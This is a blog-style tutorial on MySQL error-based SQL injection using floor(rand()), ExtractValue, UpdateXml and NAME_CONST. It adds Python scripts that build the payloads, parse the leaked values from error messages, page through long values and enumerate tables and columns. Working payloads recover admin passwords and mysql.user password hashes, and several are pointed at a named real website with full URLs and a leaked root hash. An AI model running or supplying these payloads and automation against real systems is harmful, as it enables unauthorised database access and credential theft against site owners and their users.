MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Both rely on the same mechanism: floor(rand(0)*2) is evaluated once when a group key is looked up in the temporary table and again when the new group is inserted, so an inserted key can collide with an existing one, and MySQL reports the colliding key verbatim, i.e. the concatenated value with a trailing 0 or 1. The table being grouped needs at least three rows for the collision to happen; the first form takes them from information_schema.tables, the second builds its own three-row derived table with the union. The expression inside concat() must return exactly one row.

Example:
First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error (the trailing 1 is the floor() digit, so the version is 5.1.33-community-log). To query other data, replace version() with the wanted expression. For example, to read the admin user's password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

In both cases the password is admin888; the final 1 comes from floor(rand(0)*2) and must be discarded.

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

0x5c is a backslash, which is illegal at the start of an XPath expression, so the parser fails on the first character and the error quotes everything after it. The error message shows at most 32 characters of the expression (31 characters of data after the marker); longer values have to be read in pieces with substr(). ExtractValue() and UpdateXML() exist from MySQL 5.1.5 on.

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Here 0x3a (a colon) plays the role of the backslash above, and the same 32-character limit on the quoted expression applies.
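The three techniques above, automated: an added example that is not code from the original post. It builds the floor()/extractvalue()/updatexml() fragments for the post's "article.id" injection point, recovers the leaked value from the error text (stripping the floor() digit and the 0x5c/0x3a marker), and pages a long value through the 32-character XPath error limit with substr(). No request is sent; fake_target() is a constructed stand-in that answers the way MySQL would if the injected expression evaluated to a given string.

```python
import re

# Added example; not code from the original post. The "article.id" injection point from
# the post is assumed, and fake_target() below is a constructed stand-in for a real server.

XPATH_LIMIT = 32  # MySQL quotes at most 32 characters of the invalid XPath expression


def floor_payload(expr):
    """floor(rand(0)*2) + group by duplicate-key payload (ERROR 1062).
    `expr` is a scalar SQL expression such as "version()" or "(select pass from admin limit 1)".
    The leaked key ends with the 0/1 from floor(); leaked_value() strips it again."""
    return ("and (select 1 from (select count(*),concat(%s,floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % expr)


def extractvalue_payload(expr, offset=1, width=XPATH_LIMIT - 1):
    """0x5c ('\\') makes the XPath invalid from its first character, so the error quotes
    everything after it. substr() pages through values longer than 31 characters."""
    return "and extractvalue(1,concat(0x5c,substr(%s,%d,%d)))" % (expr, offset, width)


def updatexml_payload(expr, offset=1, width=XPATH_LIMIT - 1):
    """Same idea with 0x3a (':') as the marker, as in the post's updatexml() example."""
    return "and 1=(updatexml(1,concat(0x3a,substr(%s,%d,%d)),1))" % (expr, offset, width)


_LEAK_PATTERNS = (
    re.compile(r"Duplicate entry '(.*)[01]' for key '[^']*'"),  # floor(): drop the rand() digit
    re.compile(r"XPATH syntax error: '[\\:](.*)'"),              # extractvalue/updatexml: drop the marker
    re.compile(r"Duplicate column name '(.*)'"),                 # name_const join trick (later in the post)
)


def leaked_value(error_text):
    """Return the value carried in one of the three error formats, or None."""
    for pattern in _LEAK_PATTERNS:
        match = pattern.search(error_text)
        if match:
            return match.group(1)
    return None


def dump_via_xpath(send, expr, width=XPATH_LIMIT - 1):
    """Read `expr` in 31-character pieces until a short or empty piece comes back.
    `send(fragment)` must return the error text the application shows, or None."""
    result, offset = "", 1
    while True:
        piece = leaked_value(send(extractvalue_payload(expr, offset, width)) or "")
        if not piece:
            return result
        result += piece
        if len(piece) < width:
            return result
        offset += width


_SUBSTR = re.compile(r"substr\((.+),(\d+),(\d+)\)")


def fake_target(secret):
    """Constructed oracle: answers an extractvalue() payload the way MySQL would if the
    injected expression evaluated to `secret` (substr() applied, 32-char cap included)."""
    def send(fragment):
        m = _SUBSTR.search(fragment)
        if m is None:
            return None
        start, length = int(m.group(2)), int(m.group(3))
        chunk = secret[start - 1:start - 1 + length]
        return "ERROR 1105 (HY000): XPATH syntax error: '\\%s'" % chunk[:XPATH_LIMIT - 1]
    return send


if __name__ == "__main__":
    oracle = fake_target("root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82")
    print(dump_via_xpath(oracle, "(select concat(user,password) from mysql.user limit 1)"))
```

On a real target, `send` is whatever issues the HTTP request and returns the error text the page echoes; the paging loop stops on the first piece shorter than 31 characters, or on an empty piece when the value length is an exact multiple of 31.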


Further collected:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

name_const() names its result column after the value of its first argument; joining two derived tables that each produce a column with that name raises ERROR 1060 (Duplicate column name), which quotes the value.
MySQL error-based injection trick for higher versions: injection via NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. Later releases also enforce the "arguments should be constants" rule quoted below and answer "Incorrect arguments to NAME_CONST" when the name is a function call, a system variable or a subquery, which confines this trick to older builds such as the 5.0.27 server used here.

Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

mysql> SELECT NAME_CONST('TEST', 1);
+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a "duplicate column name '1'" error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the table names out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Increment the 0 in limit+0,1 (limit+1,1, limit+2,1, ...) to walk through the remaining tables one per request.
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

The table name is passed as a hex literal (0x...) so that no quote characters are needed; 0x6d7973716c is "mysql" and 0x75736572 is "user". So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Time to finish this off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

0x207e20 is " ~ ", the separator concat_ws() puts between the two column values.

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
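The "limit+0,1" walk the NAME_CONST tutorial does by hand, automated: an added example, not code from the tutorial or the post. It builds the duplicate-column payload (with literal spaces instead of the "+" URL encoding used above), hex-encodes schema and table names the way the tutorial does, and enumerates tables and then columns by incrementing the limit offset until the target stops raising "Duplicate column name". fake_target() is a constructed in-memory schema standing in for a real server; it assumes that once the scalar subquery runs past the last row (and returns NULL) no duplicate-column error surfaces, which is the stop condition to verify against a real target.

```python
import re

# Added example; not code from the original tutorial. fake_target() is a constructed
# stand-in for a vulnerable page backed by an old 5.0 server that accepts non-constant
# NAME_CONST() arguments.


def name_const_payload(subquery):
    """Two identically named NAME_CONST() columns in one derived table -> ERROR 1060
    'Duplicate column name <value>'. Spaces are literal here; URL-encode before sending."""
    return ("and 1=(select * from (select NAME_CONST((%s),1),NAME_CONST((%s),1)) as x)--"
            % (subquery, subquery))


def hexlit(s):
    """0x.. literal so no quote characters are needed, e.g. table_name=0x75736572 ('user')."""
    return "0x" + s.encode().hex()


def row_subquery(column, table, where, row):
    return "select %s from %s where %s limit %d,1" % (column, table, where, row)


_DUP = re.compile(r"Duplicate column name '([^']*)'")


def enumerate_rows(send, column, table, where, max_rows=500):
    """Ask for row 0, 1, 2, ... until the target stops raising the duplicate-column error.
    Assumption: past the last row the scalar subquery is NULL and no error surfaces."""
    rows = []
    for n in range(max_rows):
        error = send(name_const_payload(row_subquery(column, table, where, n))) or ""
        match = _DUP.search(error)
        if match is None:
            break
        rows.append(match.group(1))
    return rows


def enumerate_schema(send, schema_name):
    """Table names of `schema_name`, then the column names of each table."""
    tables = enumerate_rows(send, "table_name", "information_schema.tables",
                            "table_schema=%s" % hexlit(schema_name))
    return {t: enumerate_rows(send, "column_name", "information_schema.columns",
                              "table_schema=%s and table_name=%s" % (hexlit(schema_name), hexlit(t)))
            for t in tables}


_ROW = re.compile(r"select \w+ from information_schema\.(tables|columns) where (.*?) limit (\d+),1")
_HEX = re.compile(r"(table_schema|table_name)=0x([0-9a-f]+)")


def fake_target(schema):
    """Constructed oracle over {schema: {table: [columns]}} that mimics ERROR 1060."""
    def send(fragment):
        m = _ROW.search(fragment)
        if m is None:
            return None
        source, where, n = m.group(1), m.group(2), int(m.group(3))
        filt = {k: bytes.fromhex(v).decode() for k, v in _HEX.findall(where)}
        db = schema.get(filt.get("table_schema"), {})
        rows = list(db) if source == "tables" else db.get(filt.get("table_name"), [])
        if n >= len(rows):
            return None  # subquery yields NULL: assumed to produce no error
        return "Error: Duplicate column name '%s'" % rows[n]
    return send


if __name__ == "__main__":
    demo = {"mysql": {"user": ["Host", "User", "Password"], "db": ["Host", "Db"]}}  # constructed
    print(enumerate_schema(fake_target(demo), "mysql"))
```

Once the columns are known, the same enumerate_rows() call with column="concat_ws(0x207e20,User,Password)" and table="mysql.user" (and a where clause of "1=1") dumps the rows, which is the tutorial's final step.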